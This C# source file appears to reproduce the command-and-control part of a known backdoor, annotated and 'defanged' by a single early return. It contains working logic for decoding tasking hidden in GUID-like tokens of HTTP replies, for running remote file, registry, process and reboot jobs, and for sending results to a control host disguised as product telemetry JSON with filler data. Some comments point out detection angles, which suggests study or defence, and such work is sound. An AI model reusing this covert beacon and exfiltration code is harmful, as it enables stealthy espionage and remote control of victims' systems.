/// <summary>
/// Routes a file-system job code to the matching <c>Job</c> routine.
/// Only <c>GetFileHash</c> reports an error code; the other file jobs leave it at 0.
/// </summary>
/// <param name="job">Job code produced by <c>ParseServiceResponse</c> and selected in <c>ExecuteEngine</c>.</param>
/// <param name="args">Tokenized command line for the job.</param>
/// <param name="result">Text output of the job, or null when the job produces none.</param>
/// <returns>Error code from <c>Job.GetFileHash</c>, otherwise 0.</returns>
private static int AddFileExecutionEngine(HttpHelper.JobEngine job, string[] args, out string result)
{
    result = null;
    int errorCode = 0;
    if (job == HttpHelper.JobEngine.GetFileSystemEntries)
    {
        Job.GetFileSystemEntries(args, out result);
    }
    else if (job == HttpHelper.JobEngine.WriteFile)
    {
        Job.WriteFile(args);
    }
    else if (job == HttpHelper.JobEngine.FileExists)
    {
        Job.FileExists(args, out result);
    }
    else if (job == HttpHelper.JobEngine.DeleteFile)
    {
        Job.DeleteFile(args);
    }
    else if (job == HttpHelper.JobEngine.GetFileHash)
    {
        // The only file job whose return value is surfaced to the caller.
        errorCode = Job.GetFileHash(args, out result);
    }
    return errorCode;
}
/// <summary>
/// Routes a registry job code to the matching <c>Job</c> routine.
/// <c>ReadRegistryValue</c> and <c>SetRegistryValue</c> report an error code; the other two always yield 0.
/// </summary>
/// <param name="job">Job code selected in <c>ExecuteEngine</c>.</param>
/// <param name="args">Tokenized command line for the job.</param>
/// <param name="result">Text output of the job, or null when the job produces none.</param>
/// <returns>Error code from the read/set routines, otherwise 0.</returns>
private static int AddRegistryExecutionEngine(HttpHelper.JobEngine job, string[] args, out string result)
{
    result = null;
    switch (job)
    {
        case HttpHelper.JobEngine.ReadRegistryValue:
            return Job.ReadRegistryValue(args, out result);
        case HttpHelper.JobEngine.SetRegistryValue:
            return Job.SetRegistryValue(args);
        case HttpHelper.JobEngine.DeleteRegistryValue:
            Job.DeleteRegistryValue(args);
            return 0;
        case HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames:
            Job.GetRegistrySubKeyAndValueNames(args, out result);
            return 0;
        default:
            // Non-registry job codes are ignored here; the caller filters before dispatching.
            return 0;
    }
}
/// <summary>
/// Decodes a job code and its argument string out of an HTTP response body.
/// The extraction path depends on the verb of the request that produced the body
/// (<c>this.requestMethod</c>): after a PUT the payload follows a 48-byte prefix, after a
/// POST a 12-byte prefix, and otherwise (GET/HEAD) the response text is scanned for
/// GUID- or hex-shaped tokens which are concatenated and hex-decoded. In every case the
/// payload is a 4-byte Int32 length (host byte order) followed by that many bytes, which
/// are passed through <c>HttpHelper.Deflate</c> and read as "&lt;jobId&gt; &lt;args&gt;".
/// Any malformed input, or any exception, yields <c>JobEngine.None</c>.
/// </summary>
/// <param name="body">Raw response body; may be null.</param>
/// <param name="args">Text after the first space of the decoded command, or null.</param>
/// <returns>A defined <c>JobEngine</c> value, or <c>None</c> when nothing usable was found.</returns>
private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
{
    args = null;
    try
    {
        if (body == null || body.Length < 4)
        {
            return(HttpHelper.JobEngine.None);
        }
        HttpOipMethods httpOipMethods = this.requestMethod;
        if (httpOipMethods != HttpOipMethods.Put)
        {
            if (httpOipMethods != HttpOipMethods.Post)
            {
                // GET/HEAD path: the tasking is hidden inside text that merely looks like
                // GUIDs / hex ids. Decoded pattern of the unzipped string:
                // "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
                // Detection angle: any response whose quoted GUID/hex tokens, stripped of
                // quotes, braces and dashes, hex-decode to a length-prefixed blob is tasking.
                string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase) select m.Value).ToArray <string>();
                body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
            }
            else
            {
                // POST reply: fixed 12-byte prefix before the length-prefixed payload.
                body = body.Skip(12).ToArray <byte>();
            }
        }
        else
        {
            // PUT reply: fixed 48-byte prefix before the length-prefixed payload.
            body = body.Skip(48).ToArray <byte>();
        }
        // Length is attacker-controlled; a negative or oversized value makes Take() return
        // fewer bytes than requested and the mismatch check below rejects it.
        int num = BitConverter.ToInt32(body, 0);
        body = body.Skip(4).Take(num).ToArray <byte>();
        if (body.Length != num)
        {
            return(HttpHelper.JobEngine.None);
        }
        // HttpHelper.Deflate is presumably the decompression counterpart of the
        // HttpHelper.Inflate used on the upload side — verify against the helper.
        // Command format after decoding: "<numeric job id> <argument string>".
        string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[] { ' ' }, 2);
        // int.Parse throws on non-numeric ids; the catch below turns that into None.
        HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
        args = ((array.Length > 1) ? array[1] : null);
        // Unknown numeric ids are rejected rather than dispatched.
        return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
    }
    catch (Exception)
    {
        // Deliberate swallow: a malformed reply is indistinguishable from "no tasking".
    }
    return(HttpHelper.JobEngine.None);
}
/// <summary>
/// Builds and sends one beacon/upload request to <c>this.httpHost</c>.
/// Verb selection: HEAD when a job is pending (<paramref name="job"/> is neither Idle nor None),
/// GET otherwise; when <paramref name="response"/> is non-empty the upload payload is
/// UTF-8(response) || 4-byte err || customerId, run through <c>HttpHelper.Inflate</c>, and the
/// verb becomes PUT for payloads of at most 10000 bytes or POST above that.
/// GET/HEAD requests carry an <c>If-None-Match</c> header whose value comes from <c>GetCache()</c>.
/// A PUT that follows a GET/HEAD wraps the payload in a JSON document shaped like Orion
/// Improvement Program telemetry (userId, sessionId, steps[]); each step's Message is the
/// base64 of either a slice of the real payload (slice sizes from <c>GetIntArray</c>) or
/// 16–27 random filler bytes, and bit 1 of the step's Timestamp marks which it is
/// (set = real data). The Timestamp starts at UtcNow minus 5 minutes and is advanced by the
/// random DurationMs of each step.
/// </summary>
/// <param name="job">Job currently pending; only used to pick HEAD vs GET.</param>
/// <param name="err">Error code of the last executed job, appended to the payload and passed to <c>GetBaseUri</c>.</param>
/// <param name="response">Output text of the last executed job; null/empty means no upload.</param>
/// <param name="outData">Response body as returned by <c>CreateUploadRequestImpl</c>; null on failure.</param>
/// <returns>HTTP status from <c>CreateUploadRequestImpl</c>, or <c>(HttpStatusCode)0</c> when any exception occurred.</returns>
private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
{
    string text = this.httpHost;
    byte[] array = null;
    HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
    outData = null;
    try
    {
        if (!string.IsNullOrEmpty(response))
        {
            // Payload layout: response text, then err as 4 bytes, then the customerId bytes.
            byte[] bytes = Encoding.UTF8.GetBytes(response);
            byte[] bytes2 = BitConverter.GetBytes(err);
            byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
            Array.Copy(bytes, array2, bytes.Length);
            Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
            Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
            // HttpHelper.Inflate is presumably compression here (paired with Deflate in
            // ParseServiceResponse) — verify against the helper.
            array = HttpHelper.Inflate(array2);
            // Size threshold decides the verb and therefore the wire format below.
            httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
        }
        if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
        {
            text = Uri.UriSchemeHttps + "://" + text;
        }
        // NOTE(review): EndsWith without a StringComparison is culture-sensitive, unlike the
        // ordinal StartsWith checks above.
        if (!text.EndsWith("/"))
        {
            text += "/";
        }
        text += this.GetBaseUri(httpOipExMethods, err);
        HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
        if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
        {
            // If-None-Match
            // Polling requests carry state in a cache-validation header; GetCache() is opaque here.
            httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
        }
        if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
        {
            // Small upload after a poll: disguise the payload as telemetry JSON.
            // intArray holds the slice sizes; 0 entries produce filler steps.
            int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
            int num = 0;
            // Unix-epoch milliseconds, shifted 5 minutes into the past; bit 1 is later
            // overloaded as the "real data" flag for each step.
            ulong num2 = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
            num2 -= 300000UL;
            string text2 = "{";
            // "userId":"{0}",
            text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
            // "sessionId":"{0}",
            text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[] { '{', '}' }));
            // "steps":[
            text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
            for (int i = 0; i < intArray.Length; i++)
            {
                // Roughly one step in four gets a random 0..511 ms "duration"; the others get 0.
                uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
                num2 += (ulong)num3;
                byte[] array3;
                if (intArray[i] > 0)
                {
                    // Real slice: set bit 1 of the timestamp and take the next intArray[i] bytes.
                    num2 |= 2UL;
                    array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
                    num += intArray[i];
                }
                else
                {
                    // Filler slice: clear bit 1 (mask is ~2UL) and emit 16..27 random bytes.
                    num2 &= 18446744073709551613UL;
                    array3 = new byte[this.random.Next(16, 28)];
                    for (int j = 0; j < array3.Length; j++)
                    {
                        array3[j] = (byte)this.random.Next();
                    }
                }
                text2 += "{";
                // "Timestamp":"\/Date({0})\/",
                text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
                string str = text2;
                // "Index":{0},
                string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
                // Monotonic per-instance step counter, persisted in this.mIndex across requests.
                int num4 = this.mIndex;
                this.mIndex = num4 + 1;
                text2 = str + string.Format(format, num4);
                // "EventType":"Orion",
                text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
                // "EventName":"EventManager",
                text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
                // "DurationMs":{0},
                text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
                // "Succeeded":true,
                text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
                // "Message":"{0}"
                // Base64 with "/" escaped as "\/" — a fixed formatting quirk useful for matching.
                text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
                text2 += ((i + 1 != intArray.Length) ? "}," : "}");
            }
            text2 += "]}";
            // application/json
            httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
            array = Encoding.UTF8.GetBytes(text2);
        }
        if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
        {
            // application/octet-stream
            // Large uploads, or any upload after a PUT/POST, go out as a raw binary body.
            httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
        }
        return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
    }
    catch (Exception)
    {
        // Deliberate swallow: network/URI failures surface only as status 0 to the caller.
    }
    return((HttpStatusCode)0);
}
/// <summary>
/// Executes one decoded job. Registry jobs are delegated to <c>AddRegistryExecutionEngine</c>,
/// file jobs to <c>AddFileExecutionEngine</c>, and the remaining job codes are handled inline.
/// For file jobs the returned error code is the file engine's; for everything else it is
/// whatever the registry engine or <c>Job.RunTask</c> produced (0 when neither ran).
/// If a job throws, the exception message is appended to <paramref name="result"/> and
/// <c>ex.HResult</c> is returned, so failure text is reported back like ordinary output.
/// </summary>
/// <param name="job">Job code to run; Idle/None match no branch here.</param>
/// <param name="cl">Raw command line; tokenized by <c>Job.SplitString</c> and also passed whole to <c>RunTask</c>.</param>
/// <param name="result">Job output text, or null when the job produced none.</param>
/// <returns>Error code as described in the summary.</returns>
private int ExecuteEngine(HttpHelper.JobEngine job, string cl, out string result)
{
    result = null;
    int num = 0;
    string[] args = Job.SplitString(cl);
    int result2;
    try
    {
        if (job == HttpHelper.JobEngine.ReadRegistryValue || job == HttpHelper.JobEngine.SetRegistryValue || job == HttpHelper.JobEngine.DeleteRegistryValue || job == HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames)
        {
            num = HttpHelper.AddRegistryExecutionEngine(job, args, out result);
        }
        switch (job)
        {
            case HttpHelper.JobEngine.SetTime:
            {
                // Adjusts the beacon interval kept in this.delay; the value itself comes from Job.SetTime.
                int num2;
                Job.SetTime(args, out num2);
                this.delay = num2;
                break;
            }
            case HttpHelper.JobEngine.CollectSystemDescription:
                Job.CollectSystemDescription(this.proxy.ToString(), out result);
                break;
            case HttpHelper.JobEngine.UploadSystemDescription:
                Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
                break;
            case HttpHelper.JobEngine.RunTask:
                // The only inline job that reports an error code.
                num = Job.RunTask(args, cl, out result);
                break;
            case HttpHelper.JobEngine.GetProcessByDescription:
                Job.GetProcessByDescription(args, out result);
                break;
            case HttpHelper.JobEngine.KillTask:
                Job.KillTask(args);
                break;
        }
        if (job == HttpHelper.JobEngine.WriteFile || job == HttpHelper.JobEngine.FileExists || job == HttpHelper.JobEngine.DeleteFile || job == HttpHelper.JobEngine.GetFileHash || job == HttpHelper.JobEngine.GetFileSystemEntries)
        {
            // File jobs never reach the registry branch or RunTask, so num is 0 here and discarded.
            result2 = HttpHelper.AddFileExecutionEngine(job, args, out result);
        }
        else
        {
            result2 = num;
        }
    }
    catch (Exception ex)
    {
        // Exception text is appended to any partial output; the caller forwards result
        // as the next upload, so this is the error channel rather than a local log.
        if (!string.IsNullOrEmpty(result))
        {
            result += "\n";
        }
        result += ex.Message;
        result2 = ex.HResult;
    }
    return(result2);
}
/// <summary>
/// Main beacon loop. Each iteration sends one request via <c>CreateUploadRequest</c> (carrying the
/// previous job's output and error code) and, in the original flow, maps the HTTP status to one of
/// three labels: <c>IL_89</c> handles a usable reply (200 → parse a job, 204 → None, 304 → Idle),
/// <c>IL_DC</c> backs off 1–5 minutes via <c>Utilities.DelayMin</c> for any other non-zero status,
/// and <c>IL_E3</c> increments the attempt counter and loops. A status of 0 (request threw) takes
/// the increment path with no delay. The counter is reset by <c>IsSynchronized</c> and whenever a
/// real job (not None/Idle) is received; the loop ends once it exceeds 3, on <c>isAbort</c>, on
/// <c>TrackEvent()</c>, or after an Exit/Reboot job.
/// This build is DEFANGED: the unconditional <c>return</c> after the first request makes
/// everything from that point on, including the Reboot branch after the loop, unreachable.
/// </summary>
public void Initialize()
{
    HttpHelper.JobEngine jobEngine = HttpHelper.JobEngine.Idle;
    string response = null;
    int err = 0;
    try
    {
        // num counts consecutive non-productive cycles; 1..3 are allowed.
        int num = 1;
        while (num <= 3 && !this.isAbort)
        {
            byte[] body = null;
            if (this.IsSynchronized(jobEngine == HttpHelper.JobEngine.Idle))
            {
                num = 0;
            }
            if (this.TrackEvent())
            {
                // Opaque kill-switch check; a true result ends the loop for good.
                this.isAbort = true;
                break;
            }
            HttpStatusCode httpStatusCode = this.CreateUploadRequest(jobEngine, err, response, out body);
            /*DEFANG
             * HERE WE RETURN . DONT REMOVE THAT RETURN.
             */
            Console.WriteLine("THE BACKDOOR CONNECTED TO C2 SERVER " + Settings.fakehost);
            Console.WriteLine("THE END.=====");
            Settings.instance.Close(); //<-- DO NOT REMOVE!!!!!!
            return; //<-- DO NOT REMOVE!!!!!!
            // ---- Everything below is dead code in this defanged build; kept for reading. ----
            if (jobEngine == HttpHelper.JobEngine.Exit || jobEngine == HttpHelper.JobEngine.Reboot)
            {
                this.isAbort = true;
                break;
            }
            // Status dispatch (decompiler-preserved goto graph):
            //   0            -> IL_E3 (count the attempt, no delay)
            //   200          -> IL_89
            //   204 / 304    -> IL_89
            //   anything else-> IL_DC (random 1–5 minute delay)
            if (httpStatusCode <= HttpStatusCode.OK)
            {
                if (httpStatusCode != (HttpStatusCode)0)
                {
                    if (httpStatusCode != HttpStatusCode.OK)
                    {
                        goto IL_DC;
                    }
                    goto IL_89;
                }
            }
            else
            {
                if (httpStatusCode == HttpStatusCode.NoContent || httpStatusCode == HttpStatusCode.NotModified)
                {
                    goto IL_89;
                }
                goto IL_DC;
            }
            IL_E3:
            num++;
            continue;
            IL_89:
            string cl = null;
            if (httpStatusCode != HttpStatusCode.OK)
            {
                if (httpStatusCode != HttpStatusCode.NoContent)
                {
                    // 304 Not Modified: nothing to do this cycle.
                    jobEngine = HttpHelper.JobEngine.Idle;
                }
                else
                {
                    // 204 No Content: counter is reset only if the previous cycle ran a real job.
                    num = ((jobEngine == HttpHelper.JobEngine.None || jobEngine == HttpHelper.JobEngine.Idle) ? num : 0);
                    jobEngine = HttpHelper.JobEngine.None;
                }
            }
            else
            {
                // 200 OK: the body may carry a job; a real job resets the counter.
                jobEngine = this.ParseServiceResponse(body, out cl);
                num = ((jobEngine == HttpHelper.JobEngine.None || jobEngine == HttpHelper.JobEngine.Idle) ? num : 0);
            }
            // Runs even for Idle/None; presumably a no-op for those codes — see ExecuteEngine.
            err = this.ExecuteEngine(jobEngine, cl, out response);
            goto IL_E3;
            IL_DC:
            Utilities.DelayMin(1, 5);
            goto IL_E3;
        }
        // Unreachable in the defanged build (see the return above).
        if (jobEngine == HttpHelper.JobEngine.Reboot)
        {
            NativeMethods.RebootComputer();
        }
    }
    catch (Exception)
    {
        Console.WriteLine("Error in HTTPHelper. Unable to connect");
    }
}